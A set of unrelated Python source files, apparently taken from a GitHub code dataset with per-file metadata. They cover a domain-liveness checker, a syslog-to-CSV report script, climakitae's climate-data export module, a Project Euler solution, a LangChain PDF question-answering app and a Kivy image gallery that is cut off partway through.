parser.add_argument('--input_file','-i', help='path to input file')
parser.add_argument('--output-file', '-o', default='output.txt', help='path to output file')
args = parser.parse_args()
# Shared state: candidate domains and the subset that answered.
domain_list = []
active_domain = []

def read_file(file):
    """Load newline-separated domains from `file` into domain_list."""
    with open(file, 'r') as handle:
        for raw in handle:
            domain_list.append(raw.replace('\n', ''))
def validate_existence(domain):
    """Probe `domain` with an HTTP GET; append it to active_domain if reachable."""
    try:
        requests.get(domain, timeout=10)
    except requests.exceptions.RequestException:
        # Broader than the original ConnectionError-only catch: timeouts and
        # invalid URLs previously escaped and killed the worker thread.
        print(f'Domain {domain} [is dead]')
    else:
        print(f'Domain {domain} [is active]')
        active_domain.append(domain)
def write_file():
    """Persist every live domain to the configured output file, one per line."""
    with open(args.output_file, 'w') as out:
        for domain in active_domain:
            out.write(domain + '\n')
# Load candidates, then probe them concurrently across the thread pool.
read_file(args.input_file)
with ThreadPoolExecutor() as executor:
    executor.map(validate_existence, domain_list)
write_file() | quangdaik2362001/simple_tool | is_live.py | is_live.py | py | 1,171 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "requests.exceptions.ConnectionError",
"line_number": 25,
"usage_type": "name"
},
{
"api_name"... |
72617146914 | #!/usr/bin/env python3
import re
import csv
import collections
def get_error_message_type(log):
    """Classify a log line as "ERROR" or "INFO" (None if neither marker appears)."""
    for level in ("ERROR", "INFO"):
        if re.search(level, log):
            return level
def find_errors():
    """Tally ERROR messages found in syslog.log, keyed by the message text."""
    tally = {}
    with open("syslog.log", "r") as logfile:
        for entry in logfile:
            if not re.search(r"ERROR", entry):
                continue
            print(entry)
            print("FOUND AN ERROR")
            # Message text lies between "ticky: ERROR " and the "(user)" suffix.
            message = re.search(r"(ticky).*?\s*\(", entry).group(0)
            message = message.replace(" (", "").replace("ticky: ERROR ", "")
            tally[message] = tally.get(message, 0) + 1
    return tally
def get_per_user_errors():
    """Count INFO and ERROR lines per username parsed from syslog.log."""
    per_user = {}
    with open("syslog.log", "r") as logfile:
        for entry in logfile:
            # The username is the parenthesised field of the line.
            user = re.search(r"\(.*\)", entry).group(0).replace("(", "").replace(")", "")
            per_user.setdefault(user, {"INFO": 0, "ERROR": 0})
            per_user[user][get_error_message_type(entry)] += 1
    return per_user
def write_per_user_dict_to_csv(d):
    """Write per-user INFO/ERROR counts to user_statistics.csv, sorted by username."""
    with open('user_statistics.csv', 'w', newline='', encoding='utf-8') as f:
        writer = csv.writer(f)
        writer.writerow(["Username", "INFO", "ERROR"])
        for user in sorted(d):
            writer.writerow([user, d[user]["INFO"], d[user]["ERROR"]])
def write_error_dict_to_csv(d):
    """Write error counts to error_message.csv, most frequent first."""
    with open("error_message.csv", "w", newline="", encoding="utf-8") as f:
        writer = csv.writer(f)
        writer.writerow(["Error", "Count"])
        for pair in sorted(d.items(), key=lambda item: item[1], reverse=True):
            writer.writerow(pair)
if __name__ == '__main__':
    # Generate both reports from syslog.log: error frequencies and per-user stats.
    different_error_messages_dict = find_errors()
    write_error_dict_to_csv(different_error_messages_dict)
    per_user_errors = get_per_user_errors()
    write_per_user_dict_to_csv(per_user_errors)
| annie21409/google-python-professional | final_project/tickylog.py | tickylog.py | py | 2,178 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "re.search",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 19,
"u... |
26593044181 | """Backend functions for exporting data."""
import os
import boto3
import fsspec
import shutil
import logging
import warnings
import datetime
import xarray as xr
import pandas as pd
from importlib.metadata import version as _version
from botocore.exceptions import ClientError
from climakitae.util.utils import read_csv_file
from climakitae.core.paths import variable_descriptions_csv_path, stations_csv_path
# Preserve variable/coordinate attributes through xarray operations by default.
xr.set_options(keep_attrs=True)

# Conversion factor: bytes per gigabyte (binary, 1024**3).
bytes_per_gigabyte = 1024 * 1024 * 1024
def _estimate_file_size(data, format):
    """
    Estimate file size in gigabytes when exporting `data` in `format`.

    Parameters
    ----------
    data : xarray.DataArray or xarray.Dataset
        data to export to the specified `format`
    format : str
        file format ("NetCDF" or "CSV")

    Returns
    -------
    float
        estimated file size in gigabytes

    Raises
    ------
    NotImplementedError
        if `format` is not "NetCDF" (CSV estimation is not implemented)
    """
    if format == "NetCDF":
        if isinstance(data, xr.core.dataarray.DataArray):
            if not data.name:
                # name it in order to call to_dataset on it
                data.name = "data"
            data_size = data.to_dataset().nbytes
        else:  # data is xarray Dataset
            data_size = data.nbytes
        buffer_size = 2 * 1024 * 1024  # 2 MB for miscellaneous metadata
        est_file_size = data_size + buffer_size
    else:
        # The original CSV branch was an unfinished TODO and fell through to
        # an UnboundLocalError on the return below; fail explicitly instead.
        raise NotImplementedError("CSV file size estimation is not implemented")
    return est_file_size / bytes_per_gigabyte
def _warn_large_export(file_size, file_size_threshold=5):
    """Print a warning when the estimated export size (GB) exceeds the threshold."""
    if file_size > file_size_threshold:
        print(f"WARNING: Estimated file size is {round(file_size, 2)}"
              " GB. This might take a while!")
def _list_n_none_to_string(dic):
    """Replace list values with str(value) and None values with "" (in place).

    Returns the same (mutated) dictionary for convenience.
    """
    for key, value in dic.items():
        if isinstance(value, list):
            dic[key] = str(value)
        elif value is None:
            dic[key] = ""
    return dic
def _update_attributes(data):
    """
    Update data attributes to prevent issues when exporting them to NetCDF.

    Stringify list/None attributes on the object itself, on each coordinate
    and (for Datasets) on each data variable, and drop any `units` attribute
    from the `time` coordinate.

    Parameters
    ----------
    data : xarray.DataArray or xarray.Dataset

    Returns
    -------
    None

    Notes
    -----
    These attribute updates resolve errors raised when using the scipy engine
    to write NetCDF files to S3.
    """
    data.attrs = _list_n_none_to_string(data.attrs)
    for coord_name in data.coords:
        data[coord_name].attrs = _list_n_none_to_string(data[coord_name].attrs)
    if "time" in data.coords:
        data["time"].attrs.pop("units", None)
    if isinstance(data, xr.core.dataarray.Dataset):
        for var_name in data.data_vars:
            data[var_name].attrs = _list_n_none_to_string(data[var_name].attrs)
def _unencode_missing_value(d):
    """Drop the `missing_value` encoding, if any, on data object `d`.

    Uses dict.pop with a default instead of the original bare ``except``,
    which would also have silently swallowed unrelated errors.
    """
    d.encoding.pop("missing_value", None)
def _update_encoding(data):
    """
    Update data encodings to prevent issues when exporting them to NetCDF.

    Drop the `missing_value` encoding, if present, from `data`, from each of
    its coordinates and, for Datasets, from each data variable.

    Parameters
    ----------
    data : xarray.DataArray or xarray.Dataset

    Returns
    -------
    None

    Notes
    -----
    These encoding updates resolve errors raised when writing NetCDF files to
    S3.
    """
    targets = [data] + [data[coord_name] for coord_name in data.coords]
    if isinstance(data, xr.core.dataarray.Dataset):
        targets.extend(data[var_name] for var_name in data.data_vars)
    for target in targets:
        _unencode_missing_value(target)
def _create_presigned_url(bucket_name, object_name, expiration=60 * 60 * 24 * 7):
    """
    Generate a presigned URL to share an S3 object.

    Parameters
    ----------
    bucket_name : string
    object_name : string
    expiration : int, optional
        Seconds the presigned URL remains valid (default: one week).

    Returns
    -------
    string
        Presigned URL, or None when the S3 client raises an error.

    References
    ----------
    https://boto3.amazonaws.com/v1/documentation/api/latest/guide/s3-presigned-urls.html#presigned-urls
    """
    client = boto3.client("s3")
    try:
        return client.generate_presigned_url(
            "get_object",
            Params={"Bucket": bucket_name, "Key": object_name},
            ExpiresIn=expiration,
        )
    except ClientError as e:
        logging.error(e)
        return None
def _export_to_netcdf(data, save_name):
    """
    Export user-selected data to NetCDF format.

    Export the xarray DataArray or Dataset `data` to a NetCDF file `save_name`.
    If there is enough disk space, the function saves the file locally;
    otherwise, it saves the file to the S3 bucket `cadcat-tmp` and provides a
    URL for download.

    Parameters
    ----------
    data : xarray.DataArray or xarray.Dataset
        data to export to NetCDF format
    save_name : string
        desired output file name, including the file extension

    Returns
    -------
    None
    """
    est_file_size = _estimate_file_size(data, "NetCDF")
    # shutil.disk_usage returns (total, used, free); index 2 is free bytes.
    disk_space = shutil.disk_usage("./")[2] / bytes_per_gigabyte
    if disk_space > est_file_size:
        path = "./" + save_name
        if os.path.exists(path):
            raise Exception(
                (
                    f"File {save_name} exists. "
                    "Please either delete that file from the work space "
                    "or specify a new file name here."
                )
            )
        print("Alright, exporting specified data to NetCDF.")
        _warn_large_export(est_file_size)
        # Sanitize attributes/encodings so the NetCDF writer does not choke.
        _update_attributes(data)
        _update_encoding(data)
        # _FillValue=None prevents xarray from adding fill values to coordinates.
        comp = dict(_FillValue=None)
        encoding = {coord: comp for coord in data.coords}
        data.to_netcdf(path, encoding=encoding)
        print(
            (
                "Saved! You can find your file in the panel to the left"
                " and download to your local machine from there."
            )
        )
    else:
        # Not enough local disk: stream to the user's S3 scratch bucket instead.
        path = f"simplecache::{os.environ['SCRATCH_BUCKET']}/{save_name}"
        with fsspec.open(path, "wb") as fp:
            print("Alright, exporting specified data to NetCDF.")
            _warn_large_export(est_file_size)
            _update_attributes(data)
            _update_encoding(data)
            comp = dict(_FillValue=None)
            encoding = {coord: comp for coord in data.coords}
            data.to_netcdf(fp, encoding=encoding)
        # Share a time-limited download link to the object just written.
        download_url = _create_presigned_url(
            bucket_name="cadcat-tmp", object_name=path.split("cadcat-tmp/")[-1]
        )
        print(
            (
                "Saved! To download the file to your local machine, "
                "open the following URL in a web browser:"
                "\n\n"
                f"{download_url}"
                "\n\n"
                "Note: The URL will remain valid for 1 week."
            )
        )
def _get_unit(dataarray):
    """
    Return unit of data variable in `dataarray`, if any, or an empty string.

    Parameters
    ----------
    dataarray : xarray.DataArray

    Returns
    -------
    str
    """
    unit = dataarray.attrs.get("units")
    return "" if unit is None else unit
def _ease_access_in_R(column_name):
    """
    Return a copy of the input that can be used in R easily.

    Remove parentheses and turn spaces/hyphens into underscores so the string,
    used as an R data-table column name, is accessible via `$` (no spaces or
    special characters).

    Parameters
    ----------
    column_name : str

    Returns
    -------
    str

    Notes
    -----
    Applied to display names from variable_descriptions.csv and to HadISD
    station names from hadisd_stations.csv after to_dataframe conversion.
    """
    translation = str.maketrans({"(": None, ")": None, " ": "_", "-": "_"})
    return column_name.translate(translation)
def _update_header(df, variable_unit_map):
    """
    Update data table header to match the given variable names and units.

    Replace the columns of `df` with a two-row MultiIndex header: a
    "variable" row of names and a "unit" row of units, one tuple per column,
    then move the index into regular columns.

    Parameters
    ----------
    df : pandas.DataFrame
        data table to update
    variable_unit_map : list of tuple
        (variable name, unit) for each column of the input data table

    Returns
    -------
    pandas.DataFrame
        data table with updated header
    """
    header = pd.MultiIndex.from_tuples(variable_unit_map, name=["variable", "unit"])
    df.columns = header
    df.reset_index(inplace=True)  # simplifies header
    return df
def _dataarray_to_dataframe(dataarray):
    """
    Prepare xarray DataArray for export as CSV file.

    Convert `dataarray` to a pandas DataFrame via its to_dataframe method,
    rename header entries so the columns are easy to access in R, and record
    the unit of the data variable in a second header row.

    Parameters
    ----------
    dataarray : xarray.DataArray
        data to be prepared for export

    Returns
    -------
    pandas.DataFrame
        data ready for export
    """
    if not dataarray.name:
        # to_dataframe requires a named DataArray.
        dataarray.name = "data"
    df = dataarray.to_dataframe()
    unit = _get_unit(dataarray)
    # Only the data-variable column carries a unit; index-derived columns don't.
    variable_unit_map = [
        (_ease_access_in_R(col), unit if col == dataarray.name else "")
        for col in df.columns
    ]
    return _update_header(df, variable_unit_map)
def _dataset_to_dataframe(dataset):
    """
    Prepare xarray Dataset for export as CSV file.

    Convert the xarray Dataset `dataset` to a pandas DataFrame ready to be
    exported to CSV format. The Dataset is converted through its to_dataframe
    method. The DataFrame header is renamed as needed to ease the access of
    columns in R. It is also enriched with the units associated with the data
    variables and other non-index variables in the Dataset. If the Dataset
    contains station data, the name of any climate variable associated with
    the station(s) is added to the header as well.

    Parameters
    ----------
    dataset : xarray.Dataset
        data to be prepared for export

    Returns
    -------
    pandas.DataFrame
        data ready for export
    """
    df = dataset.to_dataframe()
    variable_unit_map = [
        (var_name, _get_unit(dataset[var_name])) for var_name in df.columns
    ]
    df = _update_header(df, variable_unit_map)

    # Helpers for adding to header climate variable names associated w/ stations
    station_df = read_csv_file(stations_csv_path)
    station_lst = list(station_df.station)

    def _is_station(name):
        """Return True if `name` is an HadISD station name."""
        return name in station_lst

    variable_description_df = read_csv_file(variable_descriptions_csv_path)
    variable_ids = variable_description_df.variable_id.values

    def _variable_id_to_name(var_id):
        """Convert variable ID to variable name.

        Return the "display_name" associated with the "variable_id" in
        variable_descriptions.csv. If `var_id` is not a "variable_id" in the
        CSV file, return an empty string.
        """
        if var_id in variable_ids:
            var_name_series = variable_description_df.loc[
                variable_ids == var_id, "display_name"
            ]
            var_name = var_name_series.to_list()[0]
            return var_name
        else:
            return ""

    def _get_station_variable_name(dataset, station):
        """Get name of climate variable stored in `dataset` variable `station`.

        Return an empty string if that is not possible.
        """
        try:
            station_da = dataset[station]  # DataArray
            data_attrs = station_da.attrs
            if "variable_id" in data_attrs and data_attrs["variable_id"] is not None:
                var_id = data_attrs["variable_id"]
                var_name = _variable_id_to_name(var_id)
                return var_name
            else:
                return ""
        except:
            return ""

    # Add to header: name of any climate variable associated with stations
    column_names = df.columns.get_level_values(0)
    climate_var_lst = []
    for name in column_names:
        if _is_station(name):
            climate_var = _get_station_variable_name(dataset, station=name)
        else:
            climate_var = ""
        climate_var_lst.append(climate_var)
    # Only rebuild the header when at least one station column carried a
    # climate variable name.
    if set(climate_var_lst) != {""}:
        # Insert climate variable names to the 2nd row
        header_df = df.columns.to_frame()
        header_df.insert(1, "", climate_var_lst)
        # The 1st row was named "variable" by `_update_header`
        header_df.variable = header_df.variable.map(_ease_access_in_R)
        df.columns = pd.MultiIndex.from_frame(header_df)
    return df
def _export_to_csv(data, output_path):
    """
    Export user-selected data to CSV format.

    Export the xarray DataArray or Dataset `data` to a gzip-compressed CSV
    file at `output_path`, writing its metadata to a companion txt file.

    Parameters
    ----------
    data : xarray.DataArray or xarray.Dataset
        data to export to CSV format
    output_path : string
        desired output file path, including the file name and file extension

    Returns
    -------
    None

    Raises
    ------
    TypeError
        if `data` is neither a DataArray nor a Dataset
    """
    print("Alright, exporting specified data to CSV.")
    # Fix: use isinstance (robust to subclasses) instead of exact type
    # comparison, and fail loudly for unsupported inputs — previously `df`
    # would be referenced before assignment, raising a confusing NameError.
    if isinstance(data, xr.core.dataarray.DataArray):
        df = _dataarray_to_dataframe(data)
    elif isinstance(data, xr.core.dataset.Dataset):
        df = _dataset_to_dataframe(data)
    else:
        raise TypeError(
            "Expected an xarray DataArray or Dataset, got " + str(type(data))
        )
    # Warn about exceedance of Excel row or column limit
    excel_row_limit = 1048576
    excel_column_limit = 16384
    csv_nrows, csv_ncolumns = df.shape
    if csv_nrows > excel_row_limit or csv_ncolumns > excel_column_limit:
        warnings.warn(
            f"Dataset exceeds Excel limits of {excel_row_limit} rows "
            f"and {excel_column_limit} columns."
        )
    _metadata_to_file(data, output_path)
    df.to_csv(output_path, compression="gzip")
def export(data, filename="dataexport", format="NetCDF"):
    """Save data as a file in the current working directory.

    Parameters
    ----------
    data : xr.DataArray or xr.Dataset
        Data to export, as output by e.g. `climakitae.Select().retrieve()`.
    filename : str, optional
        Output file name (without file extension, i.e. "my_filename" instead
        of "my_filename.nc"). The default is "dataexport".
    format : str, optional
        File format ("NetCDF" or "CSV"). The default is "NetCDF".

    Raises
    ------
    Exception
        If `data`, `filename` or `format` is invalid, if the output file
        already exists, or if there is not enough free disk space.
    """
    # Fix: validate with isinstance (robust to subclasses) instead of
    # comparing types for equality.
    if not isinstance(data, (xr.core.dataset.Dataset, xr.core.dataarray.DataArray)):
        raise Exception(
            "Cannot export object of type "
            + str(type(data)).strip("<class >")
            + ". Please pass an xarray dataset or data array."
        )
    if not isinstance(filename, str):
        raise Exception(
            (
                "Please pass a string"
                " (any characters surrounded by quotation marks)"
                " for your file name."
            )
        )
    # Drop anything after the first "." so a user-supplied extension is
    # ignored (note: this also truncates dotted names like "a.b" to "a").
    filename = filename.split(".")[0]
    req_format = format.lower()
    if req_format not in ["netcdf", "csv"]:
        raise Exception('Please select "NetCDF" or "CSV" as the file format.')
    extension_dict = {"netcdf": ".nc", "csv": ".csv.gz"}
    save_name = filename + extension_dict[req_format]

    # Stamp provenance attributes onto the data before writing it out.
    ds_attrs = data.attrs
    ct = datetime.datetime.now()
    ct_str = ct.strftime("%d-%b-%Y (%H:%M)")
    ck_attrs = {
        "Data_exported_from": "Cal-Adapt Analytics Engine",
        "Data_export_timestamp": ct_str,
        "Analysis_package_name": "climakitae",
        "Version": _version("climakitae"),
        "Author": "Cal-Adapt Analytics Engine Team",
        "Author_email": "analytics@cal-adapt.org",
        "Home_page": "https://github.com/cal-adapt/climakitae",
        "License": "BSD 3-Clause License",
    }
    ds_attrs.update(ck_attrs)
    data.attrs = ds_attrs

    # now here is where exporting actually begins
    # we will have different functions for each file type
    # to keep things clean-ish
    if req_format == "netcdf":
        _export_to_netcdf(data, save_name)
    elif req_format == "csv":
        output_path = "./" + save_name
        if os.path.exists(output_path):
            raise Exception(
                (
                    f"File {save_name} exists. "
                    "Please either delete that file from the work space "
                    "or specify a new file name here."
                )
            )
        # Check file size against available workspace disk space:
        # raise an error for not enough space, warn for a large file.
        file_size_threshold = 5  # in GB
        disk_space = shutil.disk_usage("./")[2] / bytes_per_gigabyte
        data_size = data.nbytes / bytes_per_gigabyte
        if disk_space <= data_size:
            raise Exception(
                "Not enough disk space to export data! You need at least "
                + str(round(data_size, 2))
                + (
                    " GB free in the hub directory, which has 10 GB total space."
                    " Try smaller subsets of space, time, scenario, and/or"
                    " simulation; pick a coarser spatial or temporal scale;"
                    " or clean any exported datasets which you have already"
                    " downloaded or do not want."
                )
            )
        if data_size > file_size_threshold:
            print(
                "WARNING: xarray data size is "
                + str(round(data_size, 2))
                + " GB. This might take a while!"
            )
        _export_to_csv(data, output_path)
    print(
        (
            "Saved! You can find your file(s) in the panel to the left"
            " and download to your local machine from there."
        )
    )
def _metadata_to_file(ds, output_name):
    """
    Write NetCDF metadata to a txt file so users can still access it
    after exporting to a CSV.

    Parameters
    ----------
    ds : xarray.DataArray or xarray.Dataset
        the data whose attributes, coordinates, and (for Datasets) data
        variables are written out
    output_name : str
        the CSV output path; a ".csv.gz" suffix is stripped and
        "_metadata.txt" appended to form the metadata file name
    """
    def _rchop(s, suffix):
        # Remove `suffix` from the end of `s`, if present (pre-3.9
        # equivalent of str.removesuffix).
        if suffix and s.endswith(suffix):
            return s[: -len(suffix)]
        return s
    output_name = _rchop(output_name, ".csv.gz")
    # Overwrite any metadata file left over from a previous export.
    if os.path.exists(output_name + "_metadata.txt"):
        os.remove(output_name + "_metadata.txt")
    print(
        "NOTE: File metadata will be written in "
        + output_name
        + (
            "_metadata.txt. We recommend you download this along with "
            "the CSV for your records."
        )
    )
    with open(output_name + "_metadata.txt", "w") as f:
        f.write("======== Metadata for CSV file " + output_name + " ========")
        f.write("\n")
        f.write("\n")
        f.write("\n")
        # Section 1: global attributes (plus the array name for DataArrays).
        f.write("===== Global file attributes =====")
        if type(ds) == xr.core.dataarray.DataArray:
            f.write("\n")
            # NOTE(review): assumes ds.name is a non-None string here —
            # concatenation would raise TypeError for an unnamed DataArray.
            f.write("Name: " + ds.name)
        f.write("\n")
        for att_keys, att_values in ds.attrs.items():
            f.write(str(att_keys) + " : " + str(att_values))
            f.write("\n")
        f.write("\n")
        f.write("\n")
        # Section 2: one sub-section per coordinate, listing its attributes.
        f.write("===== Coordinate descriptions =====")
        f.write("\n")
        f.write("Note: coordinate values are in the CSV")
        f.write("\n")
        for coord in ds.coords:
            f.write("\n")
            f.write("== " + str(coord) + " ==")
            f.write("\n")
            for att_keys, att_values in ds[coord].attrs.items():
                f.write(str(att_keys) + " : " + str(att_values))
                f.write("\n")
        # Section 3 (Datasets only): one sub-section per data variable.
        if type(ds) == xr.core.dataset.Dataset:
            f.write("\n")
            f.write("\n")
            f.write("===== Variable descriptions =====")
            f.write("\n")
            for var in ds.data_vars:
                f.write("\n")
                f.write("== " + str(var) + " ==")
                f.write("\n")
                for att_keys, att_values in ds[var].attrs.items():
                    f.write(str(att_keys) + " : " + str(att_values))
                    f.write("\n")
## TMY export functions
def _tmy_header(location_name, df):
"""
Constructs the header for the TMY output file in .tmy format
Source: https://www.nrel.gov/docs/fy08osti/43156.pdf (pg. 3)
"""
# line 1 - site information
# line 1: USAF, station name quote delimited, station state, time zone, lat, lon, elev (m)
# line 1: we provide station name, lat, lon, and simulation
line_1 = "'{0}', {1}, {2}, {3}\n".format(
location_name,
df["lat"].values[0],
df["lon"].values[0],
df["simulation"].values[0],
)
# line 2 - data field name and units, manually setting to ensure matches TMY3 labeling
line_2 = "Air Temperature at 2m (degC),Dew point temperature (degC),Relative humidity (%),Instantaneous downwelling shortwave flux at bottom (W m-2),Shortwave surface downward diffuse irradiance (W m-2),Instantaneous downwelling longwave flux at bottom (W m-2),Wind speed at 10m (m s-1),Wind direction at 10m (deg),Surface Pressure (Pa)\n"
headers = [line_1, line_2]
return headers
def _epw_header(location_name, df):
"""
Constructs the header for the TMY output file in .epw format
Source:https://designbuilder.co.uk/cahelp/Content/EnergyPlusWeatherFileFormat.htm#:~:text=The%20EPW%20weather%20data%20format,based%20with%20comma%2Dseparated%20data.
"""
# line 1 - location
line_1 = "LOCATION,{0},{1},{2}\n".format(
location_name, df["lat"].values[0], df["lon"].values[0]
)
# line 2 - design conditions, leave blank for now
line_2 = "DESIGN CONDITIONS\n"
# line 3 - typical/extreme periods, leave blank for now
line_3 = "TYPICAL/EXTREME PERIODS\n"
# line 4 - ground temperatures, leave blank for now
line_4 = "GROUND TEMPERATURES\n"
# line 5 - holidays/daylight savings, leap year (yes/no), daylight savings start, daylight savings end, num of holidays
line_5 = "HOLIDAYS/DAYLIGHT SAVINGS,No,0,0,0\n"
# line 6 - comments 1, going to include simulation + scenario information here
line_6 = "COMMENTS 1,Typical meteorological year data produced on the Cal-Adapt: Analytics Engine, Scenario: {0}, Simulation: {1}\n".format(
df["scenario"].values[0], df["simulation"].values[0]
)
# line 7 - comments 2, putting the data variables here manually as they are not specified in epw format, and we are not including all
line_7 = "COMMENTS 2,Air Temperature at 2m (degC),Dew point temperature (degC),Relative humidity (%),Instantaneous downwelling shortwave flux at bottom (W m-2),Shortwave surface downward diffuse irradiance (W m-2),Instantaneous downwelling longwave flux at bottom (W m-2),Wind speed at 10m (m s-1),Wind direction at 10m (deg),Surface Pressure (Pa)\n"
# line 8 - data periods, num data periods, num records per hour, data period name, data period start day of week, data period start (Jan 1), data period end (Dec 31)
line_8 = "DATA PERIODS,1,1,Data,,1/1,12/31\n"
headers = [line_1, line_2, line_3, line_4, line_5, line_6, line_7, line_8]
return headers
def write_tmy_file(filename_to_export, df, location_name="location", file_ext="tmy"):
    """Exports TMY data either as .epw or .tmy file

    Parameters
    ----------
    filename_to_export : str
        Filename string, constructed with station name and simulation
    df : pd.DataFrame
        Dataframe of TMY data to export
    location_name : str, optional
        Location name string, often station name
    file_ext : str, optional
        File extension for export; default is "tmy", options are "tmy" and "epw"

    Returns
    -------
    None

    Raises
    ------
    ValueError
        if `df` is not a pandas DataFrame
    """
    # Fix: use isinstance (accepts DataFrame subclasses) rather than an
    # exact type comparison.
    if not isinstance(df, pd.DataFrame):
        raise ValueError(
            "The function requires a pandas DataFrame object as the data input"
        )
    # Both supported formats share identical write logic and differ only in
    # their header constructor, so dispatch through a table instead of
    # duplicating the body per branch.
    header_builders = {"tmy": _tmy_header, "epw": _epw_header}
    if file_ext not in header_builders:
        print('Please pass either "tmy" or "epw" as a file format for export.')
        return
    path_to_file = filename_to_export + "." + file_ext
    with open(path_to_file, "w") as f:
        # Required format-specific header lines come first.
        f.writelines(header_builders[file_ext](location_name, df))
        # Header columns live in the header lines, not in the data body.
        body = df.drop(columns=["simulation", "lat", "lon", "scenario"])
        f.write(body.to_csv(sep=",", header=False, index=False))
    print(
        "TMY data exported to .{0} format with filename {1}.{0}".format(
            file_ext, filename_to_export
        )
    )
| cal-adapt/climakitae | climakitae/core/data_export.py | data_export.py | py | 26,702 | python | en | code | 11 | github-code | 1 | [
{
"api_name": "xarray.set_options",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "xarray.core",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "xarray.core",
"line_number": 103,
"usage_type": "attribute"
},
{
"api_name": "xarray.core",
... |
37210347927 | # Import os to set API key
import os
# Import OpenAI as main LLM service
from langchain.llms import OpenAI
from langchain.embeddings import OpenAIEmbeddings
# Bring in streamlit for UI/app interface
import streamlit as st
# Read the markdown content from a file
with open("styles.md", "r") as f:
markdown_content = f.read()
st.markdown(markdown_content, unsafe_allow_html=True)
# Import PDF document loaders...there's other ones as well!
from langchain.document_loaders import PyPDFLoader
# Import chroma as the vector store
from langchain.vectorstores import Chroma
# Import vector store stuff
from langchain.agents.agent_toolkits import (
create_vectorstore_agent,
VectorStoreToolkit,
VectorStoreInfo
)
# Set APIkey for OpenAI Service
with open("api_key.txt", "r") as file:
api_key = file.read().strip()
os.environ['OPENAI_API_KEY'] = api_key
# Create instance of OpenAI LLM
llm = OpenAI(temperature=0.1, verbose=True)
embeddings = OpenAIEmbeddings()
# Create and load PDF Loader
loader = PyPDFLoader('FinanceReport.pdf')
# Split pages from pdf
pages = loader.load_and_split()
# Load documents into vector database aka ChromaDB
store = Chroma.from_documents(pages, embeddings, collection_name='Report2023')
# Create vectorstore info object - metadata repo?
vectorstore_info = VectorStoreInfo(
name="finance_report",
description="a finance report as a pdf",
vectorstore=store
)
# Convert the document store into a langchain toolkit
toolkit = VectorStoreToolkit(vectorstore_info=vectorstore_info)
# Add the toolkit to an end-to-end LC
agent_executor = create_vectorstore_agent(
llm=llm,
toolkit=toolkit,
verbose=True
)
# Create a text input box for the user
prompt = st.text_input('Input your request here')
# If the user hits enter
if prompt:
# Then pass the prompt to the LLM
response = agent_executor.run(prompt)
# ...and write it out to the screen
st.write(response) | NikolaienkoIgor/RAGreport | app.py | app.py | py | 1,942 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "streamlit.markdown",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "langchain.llms.OpenAI",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "langchain.em... |
4062645307 | # Powerful digit counts
# Problem 63
# The 5-digit number, 16807=7**5, is also a fifth power. Similarly, the 9-digit number, 134217728=8**9, is a ninth power.
# How many n-digit positive integers exist which are also an nth power?
# https://projecteuler.net/problem=63
import datetime
start_time = datetime.datetime.now()
# counting the first pow for 1-9 numbers - we already have 9 at the start
iCount = 9
for i in range(2, 10):
pow_i = i
bFound = False
# starts with square (pow = 2)
for j in range(2, 100):
pow_i *= i
s = str(pow_i)
if len(s) == j:
iCount += 1
bFound = True
else:
if bFound:
break
stop_time = datetime.datetime.now()
print(stop_time - start_time)
print(iCount) | IgorKon/ProjectEuler | 063.py | 063.py | py | 785 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "datetime.datetime.now",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "da... |
2284786552 | import os
from kivy.app import App
from kivy.core.window import Window
from kivy.metrics import dp
from kivy.uix.button import Button
from kivy.uix.gridlayout import GridLayout
from kivy.uix.image import Image
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.uix.scrollview import ScrollView
class SquareImage(Image):
    """An Image that stretches to fill its box and stays square.

    Fix: the original set `height = dp(self.width)` once in __init__, which
    (a) used the construction-time default width, never the laid-out width,
    and (b) re-scaled an already-pixel value through dp(). The height now
    tracks the width whenever the layout resizes the widget.
    """

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.allow_stretch = True
        self.keep_ratio = False
        # Height is managed manually (not by the layout).
        self.size_hint_y = None
        self.bind(width=self._match_height_to_width)
        self._match_height_to_width(self, self.width)

    def _match_height_to_width(self, _instance, width):
        """Keep the widget square by mirroring the width into the height."""
        self.height = width
class MyNewGallery(Screen):
    """Scrollable 3-column gallery screen showing every image in a folder."""

    # Folder scanned for images; defined once instead of being duplicated
    # in path string and image-source string.
    IMAGES_DIR = "/home/petchorine/Desktop/monPyhon/mes_projets_python/Double_view/Images"

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        my_scroll = ScrollView(size_hint=(1, None), size=(Window.width, Window.height))
        self.my_gallery_grid = GridLayout(cols=3, spacing=dp(5), padding=dp(5),
                                          size_hint=(1, None), height=1000)
        self.add_images_to_gallery()
        my_scroll.add_widget(self.my_gallery_grid)
        self.add_widget(my_scroll)

    def add_images_to_gallery(self, *args):
        """Add one SquareImage per regular file found in IMAGES_DIR."""
        for filename in os.listdir(self.IMAGES_DIR):
            full_path = os.path.join(self.IMAGES_DIR, filename)
            if os.path.isfile(full_path):
                # Bug fix: the source previously used a literal placeholder
                # instead of the scanned file name, so no image could load.
                self.my_gallery_grid.add_widget(SquareImage(source=full_path))

    def refresh_gallery(self, *args):
        """Rebuild the grid so files added since the last scan show up."""
        self.my_gallery_grid.clear_widgets()
        self.add_images_to_gallery()
class MenuB(Screen):
    """Placeholder second screen; MyScreenManager attaches its navigation button."""
    pass
class MyScreenManager(ScreenManager):
    """Two-screen manager wiring navigation between the gallery and the menu."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Gallery kept as an attribute so to_gallery() can refresh it later.
